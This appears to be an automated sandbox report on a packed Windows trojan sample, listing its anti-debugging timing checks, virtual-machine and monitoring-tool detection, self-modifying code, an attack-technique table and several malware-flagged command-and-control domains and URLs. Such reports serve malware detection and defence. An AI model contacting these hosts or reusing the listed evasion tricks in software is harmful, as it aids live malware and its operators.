      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3743DE second address: 374410 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8CACC719E6h 0x00000008 jmp 00007F8CACC719EBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F8CACC719F7h 0x00000015 jmp 00007F8CACC719F1h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 374410 second address: 374423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACB12CBDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 374423 second address: 374428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 374428 second address: 37444B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CC3h 0x00000007 jl 00007F8CACB12CC2h 0x0000000d je 00007F8CACB12CB6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 374569 second address: 374581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F8CACC719E6h 0x00000012 js 00007F8CACC719E6h 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 374581 second address: 3745AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CC6h 0x00000007 jmp 00007F8CACB12CC0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3745AB second address: 3745CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8CACC719F8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3745CD second address: 3745D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 37738A second address: 3773BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719F1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F8CACC719FAh 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 387FE1 second address: 387FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 387FE5 second address: 38800A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F8CACC719F3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38800A second address: 38801E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jc 00007F8CACB12CBAh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38801E second address: 388022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 388022 second address: 388045 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CBFh 0x00000007 jmp 00007F8CACB12CBBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 388045 second address: 38804B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 387E70 second address: 387E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 387E76 second address: 387E8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8CACC719EEh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 387E8E second address: 387EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F8CACB12CBEh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC1B second address: 38FC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8CACC719EEh 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC33 second address: 38FC48 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8CACB12CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F8CACB12CC2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC48 second address: 38FC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC4E second address: 38FC5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007F8CACB12CB6h 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC5A second address: 38FC5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC5E second address: 38FC71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACB12CBDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC71 second address: 38FC77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC77 second address: 38FC7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC7D second address: 38FC81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FC81 second address: 38FCA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACB12CC8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FF6A second address: 38FF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8CACC719E6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FF7B second address: 38FF7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FF7F second address: 38FF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 38FF87 second address: 38FFA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CC0h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F8CACB12CB6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 390447 second address: 39044B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 39044B second address: 390468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CBFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jne 00007F8CACB12CB6h 0x00000012 pop edi 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 390468 second address: 39048A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8CACC719EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F8CACC719EEh 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3905DF second address: 3905E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3905E5 second address: 39061E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACC719F4h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jmp 00007F8CACC719F8h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 39061E second address: 390622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 396D3A second address: 396D44 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8CACC719ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 29F221 second address: 29F24A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CACB12CC4h 0x00000009 jmp 00007F8CACB12CC1h 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 29F24A second address: 29F25F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8CACC719E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007F8CACC719E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 29F25F second address: 29F26C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 29F26C second address: 29F270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 29F270 second address: 29F2A0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8CACB12CB6h 0x00000008 jp 00007F8CACB12CB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jl 00007F8CACB12CB6h 0x00000017 jmp 00007F8CACB12CBCh 0x0000001c jbe 00007F8CACB12CB6h 0x00000022 ja 00007F8CACB12CB6h 0x00000028 popad 0x00000029 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 29F2A0 second address: 29F2A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3A30FA second address: 3A3105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F8CACB12CB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3A5645 second address: 3A564E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3A564E second address: 3A5654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3A5654 second address: 3A565C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3A565C second address: 3A5664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B290B second address: 3B2910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B2910 second address: 3B293B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CACB12CC7h 0x00000009 jmp 00007F8CACB12CC0h 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B293B second address: 3B293F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B4236 second address: 3B423B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B40BC second address: 3B40C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B7E81 second address: 3B7E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B79BF second address: 3B79D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F8CACC719ECh 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B79D3 second address: 3B79D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3B79D7 second address: 3B79DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Special instruction interceptor: First address: 13876F instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Special instruction interceptor: First address: 13880F instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Special instruction interceptor: First address: 2D8F01 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Special instruction interceptor: First address: 2E3928 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Code function: 0_2_0013803F rdtsc 0_2_0013803F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe TID: 1216 Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe TID: 2484 Thread sleep time: -30000s >= -30000s
      Source: PH1D3KHmOD.exe, PH1D3KHmOD.exe, 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
      Source: PH1D3KHmOD.exe, 00000000.00000002.1735729903.0000000001571000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001571000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000002.1735501001.0000000001528000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: PH1D3KHmOD.exe, 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe System information queried: ModuleInformation
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Process information queried: ProcessInformation

      Anti Debugging

      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Open window title or class name: regmonclass
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Open window title or class name: gbdyllo
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Open window title or class name: procmon_window_class
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Open window title or class name: ollydbg
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Open window title or class name: filemonclass
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe File opened: NTICE
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe File opened: SICE
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe File opened: SIWVID
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Code function: 0_2_0013803F rdtsc 0_2_0013803F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Code function: 0_2_0011E110 LdrInitializeThunk,0_2_0011E110

      HIPS / PFW / Operating System Protection Evasion

      Source: PH1D3KHmOD.exe String found in binary or memory: hummskitnj.buzz
      Source: PH1D3KHmOD.exe String found in binary or memory: cashfuzysao.buzz
      Source: PH1D3KHmOD.exe String found in binary or memory: appliacnesot.buzz
      Source: PH1D3KHmOD.exe String found in binary or memory: screwamusresz.buzz
      Source: PH1D3KHmOD.exe String found in binary or memory: inherineau.buzz
      Source: PH1D3KHmOD.exe String found in binary or memory: scentniej.buzz
      Source: PH1D3KHmOD.exe String found in binary or memory: rebuildeso.buzz
      Source: PH1D3KHmOD.exe String found in binary or memory: prisonyfork.buzz
      Source: PH1D3KHmOD.exe String found in binary or memory: mindhandru.buzz
      Source: PH1D3KHmOD.exe, PH1D3KHmOD.exe, 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: rProgram Manager
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information

      Source: Yara match File source: sslproxydump.pcap, type: PCAP
      Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      Source: Yara match File source: sslproxydump.pcap, type: PCAP
      Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 24 Virtualization/Sandbox Evasion | OS Credential Dumping | 641 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
      Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 24 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 113 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 4 Obfuscated Files or Information | NTDS | 23 System Information Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

      Source | Detection | Scanner | Label
      PH1D3KHmOD.exe | 57% | Virustotal |
      PH1D3KHmOD.exe | 61% | ReversingLabs | Win32.Trojan.Generic
      PH1D3KHmOD.exe | 100% | Avira | TR/Crypt.XPACK.Gen
      PH1D3KHmOD.exe | 100% | Joe Sandbox ML |
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label
      https://mindhandru.buzz/api07 | 100% | Avira URL Cloud | malware
      https://mindhandru.buzz/apiY | 100% | Avira URL Cloud | malware
      https://mindhandru.buzz/api##3YX | 100% | Avira URL Cloud | malware
      https://mindhandru.buzz/e | 100% | Avira URL Cloud | malware
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      mindhandru.buzz | 172.67.165.185 | true | false | | high

      Name | Malicious | Antivirus Detection | Reputation
      scentniej.buzz | false | | high
      prisonyfork.buzz | false | | high
      rebuildeso.buzz | false | | high
      appliacnesot.buzz | false | | high
      hummskitnj.buzz | false | | high
      screwamusresz.buzz | false | | high
      mindhandru.buzz | false | | high
      cashfuzysao.buzz | false | | high
      inherineau.buzz | false | | high
      https://mindhandru.buzz/api | false | | high

      Name | Source | Malicious | Antivirus Detection | Reputation
      http://crl.microp | PH1D3KHmOD.exe, 00000000.00000003.1734604183.00000000015B7000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://mindhandru.buzz/api07 | PH1D3KHmOD.exe, 00000000.00000002.1735729903.0000000001571000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001571000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
      https://mindhandru.buzz/apiY | PH1D3KHmOD.exe, 00000000.00000002.1735501001.00000000014FE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
      https://mindhandru.buzz/api##3YX | PH1D3KHmOD.exe, 00000000.00000003.1734709037.000000000155B000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000002.1735729903.000000000155C000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001559000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
      https://mindhandru.buzz/pi | PH1D3KHmOD.exe, 00000000.00000002.1735729903.0000000001571000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001571000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://mindhandru.buzz/e | PH1D3KHmOD.exe, 00000000.00000002.1735682639.0000000001542000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001542000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown

      IP | Domain | Country | ASN | ASN Name | Malicious
      172.67.165.185 | mindhandru.buzz | United States | 13335 | CLOUDFLARENETUS | false

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1581225
                                Start date and time:2024-12-27 08:48:37 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 2m 51s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:1
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:PH1D3KHmOD.exe
                                renamed because original name is a hash value
